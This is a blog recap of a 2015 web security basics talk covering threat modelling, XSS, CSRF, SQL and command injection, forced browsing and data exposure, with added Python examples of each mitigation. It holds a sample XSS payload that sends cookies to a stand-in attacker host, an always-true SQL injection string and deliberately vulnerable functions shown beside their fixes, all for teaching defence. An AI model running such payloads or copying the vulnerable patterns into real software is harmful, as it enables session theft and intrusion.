Computer #Security Basics – Lessons from a Paranoid
Posted on June 19th, 2015
06/17/2015 @ Yahoo, 229 West 43rd St, 10th floor, NY
With recent high-profile attacks on businesses (such as EMC) and the U.S. government, this talk is very timely. One of the attack methods covered in this presentation (XSS) was recently revealed as a vulnerability in a widely used WordPress plugin.
- Thinking about attacks and responses
- Common web vulnerabilities
- Tools to improve security
- Modern attacks
- Thinking about threats
- Analyze security from the attacker’s perspective
- Map the system
- What are the trust boundaries?
- Which assets might an attacker be interested in?
- Who interacts with the system?
- Trust levels – who has what access rights?
- Types of attack: spoofing (pretending to be someone else), etc.
- Assess the level of risk for each type of attack, e.g. likelihood × impact, weighed against the cost of addressing it, etc.
- Consider the range of responses: do nothing (accept the risk) –vs– transfer the risk –vs– mitigate –vs– terminate (shut the server down)
- Common web vulnerabilities
- Cross-Site Scripting (XSS) – embed JS in a social message so that it runs in other users' browsers. Mitigants: use a framework that escapes output by default (e.g. converting < into &lt;); set a Content Security Policy header so the browser only loads scripts and styles from the sources you list; limit the use of inline JS and CSS.
- Cross-Site Request Forgery (CSRF) – a confused-deputy problem: the victim's browser attaches its cookies to a request the attacker crafted, which can steal money from a bank account and more. It works with an HTTP GET (e.g. a clickable or auto-loaded image whose URL hits the target) as well as an HTTP POST (an auto-submitted form). Mitigants: every form carries a nonce/token (a hidden input the bank issues, which must come back to complete the transaction); use the framework's CSRF protection; don't allow GET to change state (require POST); short cookie expiry times.
- SQL Injection – craft input that changes the SQL query so it executes more than intended, e.g. a WHERE clause that always evaluates to true. NoSQL stores are vulnerable too. Mitigants: parameterize queries so user input (such as a password) is bound as a string value rather than concatenated into the SQL text; use stored procedures within the DB; as a secondary measure, escape user-supplied input (filtering out characters such as =, for example); be explicit about allowable types, e.g. force a value to be a string or an integer.
- Command injection (Stuart considers this potentially the most damaging attack). A web page takes user input and passes it to a command, so an attacker can append additional commands after the expected input. Mitigation: run a fixed command and pass user input only as arguments, never as part of a shell command string; filter and escape all inputs so they are treated as arguments, not commands.
- Forced browsing / improper authorization – attackers use DirBuster, a tool that brute-forces URLs, to find unlinked pages such as a monitoring panel. Mitigation: enforce authorization on every resource, not just the ones you link to; use non-guessable resource IDs and passwords.
- Exposed services – Mitigation: scan your own network (including printers and cameras) for devices that could be infected and used to pivot into the network; lock down Jenkins servers, which otherwise provide a back door for command execution; password-protect everything.
- Sensitive data exposure – a reset-password email contains a token; if that token never expires, anyone who later reads the email can reset the password. Mitigation: use transport encryption; identifiers should not be guessable; encrypt sensitive information (SSNs); authenticating information should not be sent in return emails; only keep the logs you need, since logs are often not protected but may contain passwords, tokens, etc.
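The XSS mitigants above (escape on output, allow only expected URL schemes, and send a Content Security Policy) as a small added example; this is not code from the talk or the original post. The attacker message is constructed for the demonstration, and the `script_host` passed to `csp_header` is an assumed CDN origin.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input: a "social message" carrying a script payload.
MALICIOUS_MESSAGE = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_unsafe(message: str) -> str:
    """Vulnerable: user text is dropped straight into the HTML body, so a <script> tag runs."""
    return f'<p class="msg">{message}</p>'


def render_safe(message: str) -> str:
    """HTML body context: escape <, >, &, and quotes so the browser treats the text as data."""
    return f'<p class="msg">{html.escape(message, quote=True)}</p>'


def render_link(href: str, label: str) -> str:
    """URL/attribute context: escaping alone does not stop a javascript: URL, so allow-list the scheme."""
    scheme = urlparse(href.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        href = "#"  # refuse anything that is not a plain web URL
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(label, quote=True)}</a>'


def csp_header(script_host: str) -> tuple:
    """Content-Security-Policy header: scripts only from our own origin plus one listed host
    (script_host is an assumed CDN), no inline script because 'unsafe-inline' is absent,
    styles only from our origin, no plugins. Returned as a (name, value) header pair."""
    policy = (
        "default-src 'self'; "
        f"script-src 'self' {script_host}; "
        "style-src 'self'; "
        "object-src 'none'; "
        "base-uri 'self'"
    )
    return ("Content-Security-Policy", policy)


def script_survives(rendered: str) -> bool:
    """Crude marker used only for the comparison: did a live <script> tag reach the output?"""
    return "<script" in rendered.lower()
```

Escaping is context dependent: `html.escape` is right for text and quoted attributes, but a URL attribute also needs the scheme check, and the CSP is the backstop that stops an injected inline script from executing even if one escape is missed.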
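The CSRF token mitigant above, as an added example that is not part of the talk or the original post: the server keeps a per-session secret, embeds it as a hidden input in the form it serves, and refuses state changes that arrive by GET or without the matching token. The in-memory session store, the `/transfer` endpoint and the attacker's form are all constructed for the demonstration.

```python
import hmac
import secrets

SESSIONS = {}  # session_id -> session dict; constructed stand-in for a server-side session store


def new_session(user: str) -> str:
    """Log a user in: the session gets its own random CSRF token alongside the user's state."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32), "balance": 1000}
    return sid


def transfer_form(sid: str) -> str:
    """The form the bank serves: the session's secret token travels in a hidden input.
    An attacker's page on another origin cannot read this form, so it cannot learn the token."""
    token = SESSIONS[sid]["csrf"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer(method: str, sid: str, form: dict) -> tuple:
    """Server side of /transfer. Returns (HTTP status, remaining balance)."""
    sess = SESSIONS.get(sid)  # the browser sent the session cookie automatically
    if sess is None:
        return (401, None)
    if method != "POST":
        return (405, sess["balance"])  # a GET (e.g. an <img src=...>) must never change state
    supplied = form.get("csrf_token", "")
    # compare_digest avoids leaking the token byte by byte through timing differences
    if not hmac.compare_digest(supplied, sess["csrf"]):
        return (403, sess["balance"])
    sess["balance"] -= int(form["amount"])
    return (200, sess["balance"])


# Constructed attacker page: a form on evil.example that auto-submits a POST to /transfer.
# The victim's cookie goes along with it, but the attacker has no way to fill in csrf_token.
ATTACKER_FORM = {"to": "mallory", "amount": "500"}


def demo() -> tuple:
    """Forged POST, forged GET, then a legitimate POST carrying the token from the served form."""
    sid = new_session("alice")
    forged_post = handle_transfer("POST", sid, ATTACKER_FORM)
    forged_get = handle_transfer("GET", sid, {"to": "mallory", "amount": "500"})
    legit = handle_transfer("POST", sid, {"to": "bob", "amount": "100", "csrf_token": SESSIONS[sid]["csrf"]})
    return forged_post, forged_get, legit
```

The token only works because it is tied to the session and is never placed anywhere an attacker-controlled origin can read it; a framework's built-in CSRF protection does the same thing, and the "short cookie expiry" mitigant limits how long a stolen session is useful.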
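The SQL injection and command injection items above share one root cause, user input being parsed as code instead of data, so this single added example (not code from the talk or the original post) shows both, each vulnerable version beside its fix. The in-memory SQLite table and the `echo`-based "lookup" command are constructed stand-ins; a real application would call something like `ping` or `nslookup` in the same way.

```python
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    """Constructed sample user table standing in for a real user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_unsafe(db: sqlite3.Connection, name: str, password: str) -> bool:
    """Vulnerable: input is pasted into the SQL text, so a password of  ' OR '1'='1
    turns the WHERE clause into  ... AND password = '' OR '1'='1'  which is always true."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return db.execute(sql).fetchone() is not None


def login_safe(db: sqlite3.Connection, name: str, password: str) -> bool:
    """Parameterised: the driver binds name and password as string values, never as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone() is not None


def run_lookup_unsafe(host: str) -> str:
    """Vulnerable: shell=True hands the whole string to /bin/sh, so a ';' in host starts
    a second command. Here that command is only another echo, but it could be anything."""
    result = subprocess.run(f"echo lookup {host}", shell=True, capture_output=True, text=True)
    return result.stdout


def run_lookup_safe(host: str) -> str:
    """Fixed command plus an argument list and no shell: host reaches the program as one
    argument however odd it looks. Allow-list validation of host (e.g. a hostname pattern,
    and rejecting a leading '-' so it cannot be read as an option) still belongs in front of this."""
    result = subprocess.run(["echo", "lookup", host], capture_output=True, text=True)
    return result.stdout
```

Escaping quotes or semicolons is the weaker fix in both cases: the parameter binding and the argument list work because the input never passes through the SQL or shell parser at all.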
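The reset-token and logging points under sensitive data exposure, as an added example that is not code from the talk or the original post: the token that goes into the email is random, expires, is single-use, and only its hash is stored, so neither an old email nor a copy of the database is enough to reset a password later; the log helper strips token and password values from URLs before they are written. The in-memory store, the 15-minute lifetime and the parameter names treated as secret are assumptions.

```python
import hashlib
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

RESET_TTL = 15 * 60  # assumed token lifetime in seconds
RESET_STORE = {}     # sha256(token) -> {"user", "expires"}; constructed stand-in for a DB table


def digest_token(token: str) -> str:
    """Only this digest is stored; a leaked table does not yield usable tokens."""
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(user: str, now: float) -> str:
    """Create the token that goes into the reset email (and nothing else that authenticates)."""
    token = secrets.token_urlsafe(32)  # 256 bits of randomness: not guessable
    RESET_STORE[digest_token(token)] = {"user": user, "expires": now + RESET_TTL}
    return token


def consume_reset_token(token: str, now: float):
    """Return the user the token belongs to, or None. pop() makes the token single-use,
    and an expired token is removed on the way out as well."""
    entry = RESET_STORE.pop(digest_token(token), None)
    if entry is None or now > entry["expires"]:
        return None
    return entry["user"]


SECRET_PARAMS = {"token", "password", "reset"}  # assumed list of query parameters never to log


def redact_for_log(url: str) -> str:
    """Replace secret query-string values before a URL is written to an access log."""
    parts = urlsplit(url)
    query = [
        (key, "REDACTED" if key.lower() in SECRET_PARAMS else value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
    ]
    return urlunsplit(parts._replace(query=urlencode(query)))
```

The `now` parameter is passed in rather than read from the clock so the expiry path can be exercised deterministically; in production it would be `time.time()`.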
Tools to improve security
- Static analyzers – look for potential problems in source code without running it
- Vulnerability scanners e.g. Nessus
- Spidering – follow all the links on a site to map its pages
- Network scanning e.g. Nmap – port scanning
- Fuzzing – feed garbage (random or malformed input) to a system and see what happens
- Social engineering – the best protection is making everyone aware of how they can be manipulated
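The fuzzing item above, as an added example that is not code from the talk or the original post: a mutation fuzzer that takes one valid input, flips bits, truncates or inserts bytes, and records any input the target fails on with an exception it was not supposed to raise. The target is a constructed parser for a tiny length-prefixed record with a deliberate, labelled bug (it trusts the length field), so the fuzzer has something to find.

```python
import random
import struct


class ParseError(Exception):
    """The error the parser is supposed to raise on bad input."""


def parse_record(data: bytes) -> tuple:
    """Constructed target: 2-byte big-endian length, that many name bytes, then a 4-byte checksum."""
    if len(data) < 2:
        raise ParseError("too short")
    (n,) = struct.unpack(">H", data[:2])
    name = data[2:2 + n]
    # Deliberate, labelled bug: the length field is trusted, so a buffer shorter than it
    # claims leaves fewer than 4 bytes here and struct.unpack raises struct.error, not ParseError.
    (checksum,) = struct.unpack(">I", data[2 + n:2 + n + 4])
    return name, checksum


# Constructed valid seed record: length 5, name "alice", checksum 0xDEADBEEF.
SEED = struct.pack(">H", 5) + b"alice" + struct.pack(">I", 0xDEADBEEF)


def mutate(data: bytes, rng: random.Random) -> bytes:
    """One random mutation of the seed: bit flip, truncation, or garbage insertion."""
    buf = bytearray(data)
    choice = rng.randrange(3)
    if choice == 0 and buf:          # flip one bit in one byte
        i = rng.randrange(len(buf))
        buf[i] ^= 1 << rng.randrange(8)
    elif choice == 1 and buf:        # cut the buffer short
        del buf[rng.randrange(len(buf)):]
    else:                            # insert 1-7 random bytes somewhere
        i = rng.randrange(len(buf) + 1)
        buf[i:i] = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    return bytes(buf)


def check(data: bytes):
    """None if the parser coped (parsed, or raised its own ParseError);
    otherwise the class of the unexpected exception, i.e. a crash worth reporting."""
    try:
        parse_record(data)
    except ParseError:
        return None
    except Exception as exc:
        return type(exc)
    return None


def fuzz(seed: bytes, iterations: int, rng_seed: int = 0) -> list:
    """Run the fuzz loop and return (input, exception name) pairs for every crash found."""
    rng = random.Random(rng_seed)  # seeded so a run is reproducible
    crashes = []
    for _ in range(iterations):
        case = mutate(seed, rng)
        exc = check(case)
        if exc is not None:
            crashes.append((case, exc.__name__))
    return crashes
```

Real fuzzers (AFL, libFuzzer) add coverage feedback so mutations that reach new code are kept as new seeds, but the loop is the same: mutate, run, watch for the failure the program did not plan for. The saved crashing inputs are the reproducers you hand to whoever fixes the parser.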
Modern attacks
- Finding, selling and exploiting 0-day vulnerabilities – attacking your browser, office software and phones
- N-day botnets – take recently disclosed attack methods and replicate them across the net against systems that have not yet patched
- Ransomware – “will tell the FBI about ___ unless you send $$$$”
- Advanced Persistent Threats (APTs) – get into your network, stay persistent, and keep quiet.